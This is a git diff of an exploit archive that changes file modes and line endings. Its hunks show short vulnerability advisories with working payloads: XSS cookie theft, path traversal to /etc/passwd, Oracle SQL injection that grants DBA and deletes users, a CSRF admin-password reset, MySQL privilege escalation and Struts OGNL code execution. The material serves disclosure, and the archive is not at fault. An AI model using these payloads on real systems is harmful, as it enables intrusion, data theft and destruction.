b/platforms/multiple/remote/33577.txt old mode 100755 new mode 100644 index 49355ffaf..49ca3f8a2 --- a/platforms/multiple/remote/33577.txt +++ b/platforms/multiple/remote/33577.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect XAMPP 1.6.8 and prior; other versions may be affected as well. -http://www.example.com/xampp/showcode.php?TEXT[global-showcode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/xampp/showcode.php?TEXT[global-showcode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/33615.txt b/platforms/multiple/remote/33615.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33616.txt b/platforms/multiple/remote/33616.txt old mode 100755 new mode 100644 index 4aa7d7979..3c94234c1 --- a/platforms/multiple/remote/33616.txt +++ b/platforms/multiple/remote/33616.txt @@ -8,4 +8,4 @@ This issue affects Mongoose 2.8; other versions may be vulnerable as well. The following example URI is available: -http://www.example.com/file.php%20%20%20 \ No newline at end of file +http://www.example.com/file.php%20%20%20 \ No newline at end of file diff --git a/platforms/multiple/remote/33653.txt b/platforms/multiple/remote/33653.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33663.txt b/platforms/multiple/remote/33663.txt old mode 100755 new mode 100644 index deebe1f5b..83fdc630d --- a/platforms/multiple/remote/33663.txt +++ b/platforms/multiple/remote/33663.txt @@ -8,4 +8,4 @@ IBM WebSphere Portal 6.0.1.5 Build Level wp6015_008_01 is vulnerable; other vers The following code can trigger this issue: -" style="position:absolute; top:-100px; left:-100px; width:10000 px; height:10000px; z-index:999;" onmousemove="alert('XSS')"&gt; \ No newline at end of file +" style="position:absolute; top:-100px; left:-100px; width:10000 px; height:10000px; z-index:999;" onmousemove="alert('XSS')"&gt; \ No newline at end of file diff --git a/platforms/multiple/remote/33664.html b/platforms/multiple/remote/33664.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33682.txt b/platforms/multiple/remote/33682.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33686.txt b/platforms/multiple/remote/33686.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33689.as b/platforms/multiple/remote/33689.as old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33774.txt b/platforms/multiple/remote/33774.txt old mode 100755 new mode 100644 index 669b1a5c9..1afde5318 --- a/platforms/multiple/remote/33774.txt +++ b/platforms/multiple/remote/33774.txt @@ -12,4 +12,4 @@ POST /names.nsf?Login HTTP/1.1 Connection: Keep-Alive -%25%25ModDate=xxxxxxxxxxxxxxxx&Username=yyyy+zzzz&Password=aaaaaa&RedirectTo=http://www.example.com&SaveOptions=0&... \ No newline at end of file +%25%25ModDate=xxxxxxxxxxxxxxxx&Username=yyyy+zzzz&Password=aaaaaa&RedirectTo=http://www.example.com&SaveOptions=0&... \ No newline at end of file diff --git a/platforms/multiple/remote/33780.txt b/platforms/multiple/remote/33780.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33786.txt b/platforms/multiple/remote/33786.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33802.txt b/platforms/multiple/remote/33802.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33839.txt b/platforms/multiple/remote/33839.txt old mode 100755 new mode 100644 index 36f8e93e8..8ef577aac --- a/platforms/multiple/remote/33839.txt +++ b/platforms/multiple/remote/33839.txt @@ -8,4 +8,4 @@ Oracle E-Business Suite 12 is vulnerable; other versions may be affected. $ export TARGET=â?http://www.example.com:<port>/OA_HTMLâ? $ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;â? -$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â? \ No newline at end of file +$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â? \ No newline at end of file diff --git a/platforms/multiple/remote/33847.txt b/platforms/multiple/remote/33847.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33868.txt b/platforms/multiple/remote/33868.txt old mode 100755 new mode 100644 index 86177ce20..4fe03faee --- a/platforms/multiple/remote/33868.txt +++ b/platforms/multiple/remote/33868.txt @@ -10,4 +10,4 @@ NOTE: This vulnerability may be related to BID 27117 (Jetty Double Slash URI Inf http://www.example.com:8161//admin/index.jsp http://www.example.com:8161//admin/queues.jsp -http://www.example.com:8161//admin/topics.jsp \ No newline at end of file +http://www.example.com:8161//admin/topics.jsp \ No newline at end of file diff --git a/platforms/multiple/remote/33871.txt b/platforms/multiple/remote/33871.txt old mode 100755 new mode 100644 index 2691298ab..f56c850af --- a/platforms/multiple/remote/33871.txt +++ b/platforms/multiple/remote/33871.txt @@ -7,4 +7,4 @@ Exploiting these issues can allow an attacker to retrieve arbitrary local files Tiny Java Web Server 1.71 is vulnerable; other versions may also be affected. get /%00 HTTP/1.1\r\nHost: digitalwhisper.co.il<http://digitalwhisper.co.il>\r\n\r\n -GET /demo-servlets/%2fWEB-INF/config/mishka.properties HTTP/1.1 \ No newline at end of file +GET /demo-servlets/%2fWEB-INF/config/mishka.properties HTTP/1.1 \ No newline at end of file diff --git a/platforms/multiple/remote/33873.txt b/platforms/multiple/remote/33873.txt old mode 100755 new mode 100644 index 8fecebd71..2ff468498 --- a/platforms/multiple/remote/33873.txt +++ b/platforms/multiple/remote/33873.txt @@ -4,4 +4,4 @@ HP System Management Homepage is prone to an open-redirection vulnerability beca A successful exploit may aid in phishing attacks; other attacks are possible. -http://www.example.com/red2301.html?RedirectUrl=evil () attacker com \ No newline at end of file +http://www.example.com/red2301.html?RedirectUrl=evil () attacker com \ No newline at end of file diff --git a/platforms/multiple/remote/33877.c b/platforms/multiple/remote/33877.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33878.c b/platforms/multiple/remote/33878.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/33905.txt b/platforms/multiple/remote/33905.txt old mode 100755 new mode 100644 index 7510db6db..644bb3def --- a/platforms/multiple/remote/33905.txt +++ b/platforms/multiple/remote/33905.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ActiveMQ 5.3.0 and 5.3.1 are affected; other versions may also be vulnerable. -http://www.example.com:8161/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script> \ No newline at end of file +http://www.example.com:8161/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script> \ No newline at end of file diff --git a/platforms/multiple/remote/33907.txt b/platforms/multiple/remote/33907.txt old mode 100755 new mode 100644 index e53d51730..105b9978e --- a/platforms/multiple/remote/33907.txt +++ b/platforms/multiple/remote/33907.txt @@ -35,5 +35,4 @@ MMr. Than@`.................MMr. Rich=`.................MMr. Prak>`............. MMrs. Geeen................. Trimmed.... -Current vulnerability is checked and verified with zk5000 hardware model, possibly all other versions would be vulnerable. - \ No newline at end of file +Current vulnerability is checked and verified with zk5000 hardware model, possibly all other versions would be vulnerable. \ No newline at end of file diff --git a/platforms/multiple/remote/33940.txt b/platforms/multiple/remote/33940.txt old mode 100755 new mode 100644 index 6ecc3df2f..6eb5804db --- a/platforms/multiple/remote/33940.txt +++ b/platforms/multiple/remote/33940.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects VMware View versions prior to 3.1.3. -http://www.example.com/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT> \ No newline at end of file +http://www.example.com/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT> \ No newline at end of file diff --git a/platforms/multiple/remote/34048.html b/platforms/multiple/remote/34048.html old mode 100755 new mode 100644 index f34617fd6..bbffa9010 --- a/platforms/multiple/remote/34048.html +++ b/platforms/multiple/remote/34048.html @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain administrat Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected. -<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html> \ No newline at end of file +<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html> \ No newline at end of file diff --git a/platforms/multiple/remote/3405.txt b/platforms/multiple/remote/3405.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34136.txt b/platforms/multiple/remote/34136.txt old mode 100755 new mode 100644 index fa897cb06..343521032 --- a/platforms/multiple/remote/34136.txt +++ b/platforms/multiple/remote/34136.txt @@ -4,4 +4,4 @@ Plesk Server Administrator (PSA) is prone to a local file-include vulnerability An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -https://www.example.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00 \ No newline at end of file +https://www.example.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/multiple/remote/34186.txt b/platforms/multiple/remote/34186.txt old mode 100755 new mode 100644 index ca17483c9..901a12d99 --- a/platforms/multiple/remote/34186.txt +++ b/platforms/multiple/remote/34186.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to hijack a user's session and gain unauthorize Apache Axis2 1.5 is vulnerable; other versions may also be affected. -http://www.example.com:8080/axis2/axis2-admin/engagingglobally?submit=%2bEngage 2b&modules= \ No newline at end of file +http://www.example.com:8080/axis2/axis2-admin/engagingglobally?submit=%2bEngage 2b&modules= \ No newline at end of file diff --git a/platforms/multiple/remote/3425.txt b/platforms/multiple/remote/3425.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34271.txt b/platforms/multiple/remote/34271.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34297.txt b/platforms/multiple/remote/34297.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34301.txt b/platforms/multiple/remote/34301.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34310.txt b/platforms/multiple/remote/34310.txt old mode 100755 new mode 100644 index 13e874bfd..00b3f6582 --- a/platforms/multiple/remote/34310.txt +++ b/platforms/multiple/remote/34310.txt @@ -8,4 +8,4 @@ This vulnerability affects the following supported versions: 5.7 MP3, 6.0 MP5, 10.3 MP2 http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script> -http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script> \ No newline at end of file +http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script> \ No newline at end of file diff --git a/platforms/multiple/remote/34312.txt b/platforms/multiple/remote/34312.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34369.txt b/platforms/multiple/remote/34369.txt old mode 100755 new mode 100644 index f8ceb5804..821f2f6f3 --- a/platforms/multiple/remote/34369.txt +++ b/platforms/multiple/remote/34369.txt @@ -9,4 +9,4 @@ Versions prior to IBM Java SDK 1.4.2 SR13-FP6, Java SE 5.0.0-SR12, and Java SE 6 The following example URI's are available: http://www.example.com/ctx/index%c0%aehtml -http://www.example.com/ctx/index.%c1%bfj%c1%bfs%c1%bfp%c1%bf \ No newline at end of file +http://www.example.com/ctx/index.%c1%bfj%c1%bfs%c1%bfp%c1%bf \ No newline at end of file diff --git a/platforms/multiple/remote/34372.txt b/platforms/multiple/remote/34372.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34439.txt b/platforms/multiple/remote/34439.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34500.html b/platforms/multiple/remote/34500.html old mode 100755 new mode 100644 index 8bad21431..37aa6bf42 --- a/platforms/multiple/remote/34500.html +++ b/platforms/multiple/remote/34500.html @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Versions prior to Flock 3.0.0.4094 are vulnerable. -<!DOCTYPE NETSCAPE-Bookmark-file-1> <!-- This is an automatically generated file. It will be read and overwritten. DO NOT EDIT! --> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"> <TITLE>Bookmarks</TITLE> <H1>Menú Marcadores</H1> <DL><p> <DT><A HREF="http://www.example.com" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script src='http://www.example.com/thirdparty/scripts/ckers.org.js'></A> </DL><p> \ No newline at end of file +<!DOCTYPE NETSCAPE-Bookmark-file-1> <!-- This is an automatically generated file. It will be read and overwritten. DO NOT EDIT! --> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"> <TITLE>Bookmarks</TITLE> <H1>Menú Marcadores</H1> <DL><p> <DT><A HREF="http://www.example.com" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script src='http://www.example.com/thirdparty/scripts/ckers.org.js'></A> </DL><p> \ No newline at end of file diff --git a/platforms/multiple/remote/3452.php b/platforms/multiple/remote/3452.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34523.txt b/platforms/multiple/remote/34523.txt old mode 100755 new mode 100644 index 11f8a7fa1..8554d7b3a --- a/platforms/multiple/remote/34523.txt +++ b/platforms/multiple/remote/34523.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Versions prior to Nagios XI 2009R1.3 are vulnerable. -http://www.example.com/nagiosxi/admin/users.php?records=int8((select > password from xi_users where username= > CHR(110)||CHR(97)||CHR(103)||CHR(105)||CHR(111)||CHR(115)||CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)))&sortby=username&sortorder=asc&search=&page=1 \ No newline at end of file +http://www.example.com/nagiosxi/admin/users.php?records=int8((select > password from xi_users where username= > CHR(110)||CHR(97)||CHR(103)||CHR(105)||CHR(111)||CHR(115)||CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)))&sortby=username&sortorder=asc&search=&page=1 \ No newline at end of file diff --git a/platforms/multiple/remote/34691.txt b/platforms/multiple/remote/34691.txt old mode 100755 new mode 100644 index bd37db683..4b08b99b6 --- a/platforms/multiple/remote/34691.txt +++ b/platforms/multiple/remote/34691.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code would run in the context of the affected CollabNet Subversion Edge 1.2.0 is vulnerable; other versions may also be affected. The following example request is available: -GET /csvn/login</pre><script>alert('pwndd!!!!');</script> HTTP/1.0 \ No newline at end of file +GET /csvn/login</pre><script>alert('pwndd!!!!');</script> HTTP/1.0 \ No newline at end of file diff --git a/platforms/multiple/remote/34796.txt b/platforms/multiple/remote/34796.txt old mode 100755 new mode 100644 index c7d7a7784..3066e7b83 --- a/platforms/multiple/remote/34796.txt +++ b/platforms/multiple/remote/34796.txt @@ -8,4 +8,4 @@ This issue affects versions prior to MySQL 5.1.50. UPDATE db1.tbl1 /*!514900 ,mysql.user */ SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y' -WHERE mysql.user.User='user1'*/; \ No newline at end of file +WHERE mysql.user.User='user1'*/; \ No newline at end of file diff --git a/platforms/multiple/remote/349.txt b/platforms/multiple/remote/349.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/34945.txt b/platforms/multiple/remote/34945.txt old mode 100755 new mode 100644 index 4386af4c2..4e9e389b5 --- a/platforms/multiple/remote/34945.txt +++ b/platforms/multiple/remote/34945.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to view arbitrary local files withi Home File Share Server 0.7.2.32 is vulnerable; other versions may also be affected. -http://www.example.com/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F \ No newline at end of file +http://www.example.com/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F \ No newline at end of file diff --git a/platforms/multiple/remote/34952.txt b/platforms/multiple/remote/34952.txt old mode 100755 new mode 100644 index 06172b4ba..3c0d9aa4c --- a/platforms/multiple/remote/34952.txt +++ b/platforms/multiple/remote/34952.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to obtain sensitive information that Apache Shiro 1.0.0 is vulnerable; other versions may be affected. -GET /./account/index.jsp HTTP/1.1 \ No newline at end of file +GET /./account/index.jsp HTTP/1.1 \ No newline at end of file diff --git a/platforms/multiple/remote/35003.txt b/platforms/multiple/remote/35003.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35062.txt b/platforms/multiple/remote/35062.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35092.html b/platforms/multiple/remote/35092.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35144.txt b/platforms/multiple/remote/35144.txt old mode 100755 new mode 100644 index 21820dd41..648e95620 --- a/platforms/multiple/remote/35144.txt +++ b/platforms/multiple/remote/35144.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Appweb 3.2.2-1 is vulnerable; other versions may also be affected. -http://www.example.com/ejs/%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/ejs/%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/35242.txt b/platforms/multiple/remote/35242.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35243.txt b/platforms/multiple/remote/35243.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35252.php b/platforms/multiple/remote/35252.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35352.rb b/platforms/multiple/remote/35352.rb index 24dd43f68..3311dcf7a 100755 --- a/platforms/multiple/remote/35352.rb +++ b/platforms/multiple/remote/35352.rb @@ -75,16 +75,4 @@ Request distribution per hour 0:00 ? 7 hits/day ? ��������������������������������� 1:00 ? 0 hits/day ? ... -=end - - - - - - - - - - - - \ No newline at end of file +=end \ No newline at end of file diff --git a/platforms/multiple/remote/35364.txt b/platforms/multiple/remote/35364.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35366.txt b/platforms/multiple/remote/35366.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35464.txt b/platforms/multiple/remote/35464.txt old mode 100755 new mode 100644 index 97ff7ee14..63a7c91de --- a/platforms/multiple/remote/35464.txt +++ b/platforms/multiple/remote/35464.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to bypass the filter included in the download This issue affects WebReputation API 10.5; other versions may also be vulnerable. - http://www.example.com/dist/nmap-5.51-setup.exe? \ No newline at end of file + http://www.example.com/dist/nmap-5.51-setup.exe? \ No newline at end of file diff --git a/platforms/multiple/remote/35495.txt b/platforms/multiple/remote/35495.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35570.txt b/platforms/multiple/remote/35570.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35638.txt b/platforms/multiple/remote/35638.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35639.txt b/platforms/multiple/remote/35639.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35640.txt b/platforms/multiple/remote/35640.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35641.txt b/platforms/multiple/remote/35641.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35642.txt b/platforms/multiple/remote/35642.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35685.txt b/platforms/multiple/remote/35685.txt old mode 100755 new mode 100644 index 0b6aae834..b34fab938 --- a/platforms/multiple/remote/35685.txt +++ b/platforms/multiple/remote/35685.txt @@ -19,4 +19,4 @@ Contact: <sip:105@localhost>;q=1 Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING Expires: 3600 Content-Length: 0 -Max-Forwards: 70 \ No newline at end of file +Max-Forwards: 70 \ No newline at end of file diff --git a/platforms/multiple/remote/35729.txt b/platforms/multiple/remote/35729.txt old mode 100755 new mode 100644 index 48fad3931..677669e02 --- a/platforms/multiple/remote/35729.txt +++ b/platforms/multiple/remote/35729.txt @@ -4,4 +4,4 @@ Imperva SecureSphere is prone to a security-bypass vulnerability. An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities. -15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' \ No newline at end of file +15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' \ No newline at end of file diff --git a/platforms/multiple/remote/35735.txt b/platforms/multiple/remote/35735.txt old mode 100755 new mode 100644 index f4047af11..8bb6d3a36 --- a/platforms/multiple/remote/35735.txt +++ b/platforms/multiple/remote/35735.txt @@ -8,4 +8,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Apache Struts versions 2.0.0 through 2.2.1.1 are vulnerable. -http://www.example.com/struts2-blank/home.action!login:cantLogin<script>alert(document.cookie)</script>=some_value \ No newline at end of file +http://www.example.com/struts2-blank/home.action!login:cantLogin<script>alert(document.cookie)</script>=some_value \ No newline at end of file diff --git a/platforms/multiple/remote/35792.txt b/platforms/multiple/remote/35792.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35805.txt b/platforms/multiple/remote/35805.txt old mode 100755 new mode 100644 index e5496d72c..6de1cee62 --- a/platforms/multiple/remote/35805.txt +++ b/platforms/multiple/remote/35805.txt @@ -15,4 +15,4 @@ Gadu-Gadu 10.5 is affected; other versions may also be vulnerable. close\r\nContent-Length: 239\r\nContent-Type: text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click', -true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done \ No newline at end of file +true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done \ No newline at end of file diff --git a/platforms/multiple/remote/35818.txt b/platforms/multiple/remote/35818.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35892.txt b/platforms/multiple/remote/35892.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35898.php b/platforms/multiple/remote/35898.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/35918.c b/platforms/multiple/remote/35918.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/36004.txt b/platforms/multiple/remote/36004.txt old mode 100755 new mode 100644 index 14ae45828..b2f94f84c --- a/platforms/multiple/remote/36004.txt +++ b/platforms/multiple/remote/36004.txt @@ -10,4 +10,4 @@ The following sample input is available: "><iframe src='' onload=alert('mphone')> -A video demonstrating the attack is available. Please see the references for more information. \ No newline at end of file +A video demonstrating the attack is available. Please see the references for more information. \ No newline at end of file diff --git a/platforms/multiple/remote/36006.java b/platforms/multiple/remote/36006.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/36013.txt b/platforms/multiple/remote/36013.txt old mode 100755 new mode 100644 index 31f9ce88f..4f6d3ecd9 --- a/platforms/multiple/remote/36013.txt +++ b/platforms/multiple/remote/36013.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary shell commands in the co Versions prior to foomatic-gui 0.7.9.5 are vulnerable. -netbios name = oh'notquotezSIF to /etc/samba/smb.conf \ No newline at end of file +netbios name = oh'notquotezSIF to /etc/samba/smb.conf \ No newline at end of file diff --git a/platforms/multiple/remote/36016.txt b/platforms/multiple/remote/36016.txt old mode 100755 new mode 100644 index a40de5aae..4447bfa5e --- a/platforms/multiple/remote/36016.txt +++ b/platforms/multiple/remote/36016.txt @@ -13,4 +13,4 @@ Error: Couldn't find trailer dictionary Error: Couldn't read xref table rm: cannot remove `/tmp/': Is a directory $ ls -l y # The victim file is gone! -ls: cannot access y: No such file or directory \ No newline at end of file +ls: cannot access y: No such file or directory \ No newline at end of file diff --git a/platforms/multiple/remote/36130.txt b/platforms/multiple/remote/36130.txt old mode 100755 new mode 100644 index 6ce2a6dae..478846c9b --- a/platforms/multiple/remote/36130.txt +++ b/platforms/multiple/remote/36130.txt @@ -9,4 +9,4 @@ The following versions are vulnerable: Spring Security 2.0.0 through 2.0.6 Spring Security 3.0.0 through 3.0.5 -http://www.example.com//mywebapp/logout/spring-security-redirect=%0d%0a%20NewHeader%3ainjectedValue \ No newline at end of file +http://www.example.com//mywebapp/logout/spring-security-redirect=%0d%0a%20NewHeader%3ainjectedValue \ No newline at end of file diff --git a/platforms/multiple/remote/36238.txt b/platforms/multiple/remote/36238.txt old mode 100755 new mode 100644 index 7b6647006..f2be68954 --- a/platforms/multiple/remote/36238.txt +++ b/platforms/multiple/remote/36238.txt @@ -4,4 +4,4 @@ Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device. -http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm \ No newline at end of file +http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm \ No newline at end of file diff --git a/platforms/multiple/remote/36246.txt b/platforms/multiple/remote/36246.txt old mode 100755 new mode 100644 index 300371c2f..3514df4e3 --- a/platforms/multiple/remote/36246.txt +++ b/platforms/multiple/remote/36246.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary HTML and script code in Splunk versions 4.2.2 and prior are vulnerable. -http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened \ No newline at end of file +http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened \ No newline at end of file diff --git a/platforms/multiple/remote/36426.txt b/platforms/multiple/remote/36426.txt old mode 100755 new mode 100644 index fd6dbc40e..adb277590 --- a/platforms/multiple/remote/36426.txt +++ b/platforms/multiple/remote/36426.txt @@ -6,4 +6,4 @@ Successful attacks will allow attackers to bypass security restrictions and gain Apache Struts versions 2.0.9 and 2.1.8.1 are vulnerable; other versions may also be affected. -http://www.example.com/SomeAction.action?session.somekey=someValue \ No newline at end of file +http://www.example.com/SomeAction.action?session.somekey=someValue \ No newline at end of file diff --git a/platforms/multiple/remote/36455.txt b/platforms/multiple/remote/36455.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/36537.txt b/platforms/multiple/remote/36537.txt old mode 100755 new mode 100644 index cb3cd5258..121a87308 --- a/platforms/multiple/remote/36537.txt +++ b/platforms/multiple/remote/36537.txt @@ -8,4 +8,4 @@ AntiSpam & EMail 7.3.1 is vulnerable; other versions may also be affected. http://www.example.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C* -http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction= \ No newline at end of file +http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction= \ No newline at end of file diff --git a/platforms/multiple/remote/36681.txt b/platforms/multiple/remote/36681.txt old mode 100755 new mode 100644 index 8422c892b..b95bf69b7 --- a/platforms/multiple/remote/36681.txt +++ b/platforms/multiple/remote/36681.txt @@ -10,4 +10,4 @@ Apache MyFaces 2.0.1 through 2.0.11 Apache MyFaces 2.1.0 through 2.1.5 http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF -http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF \ No newline at end of file +http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF \ No newline at end of file diff --git a/platforms/multiple/remote/3708.htm b/platforms/multiple/remote/3708.htm old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/37336.txt b/platforms/multiple/remote/37336.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/37647.txt b/platforms/multiple/remote/37647.txt old mode 100755 new mode 100644 index 9b6b5660b..02c5359d6 --- a/platforms/multiple/remote/37647.txt +++ b/platforms/multiple/remote/37647.txt @@ -4,4 +4,4 @@ Apache Struts2 is prone to a remote-code-execution vulnerability because it fail Attackers can exploit this issue to execute arbitrary code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. -%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())} \ No newline at end of file 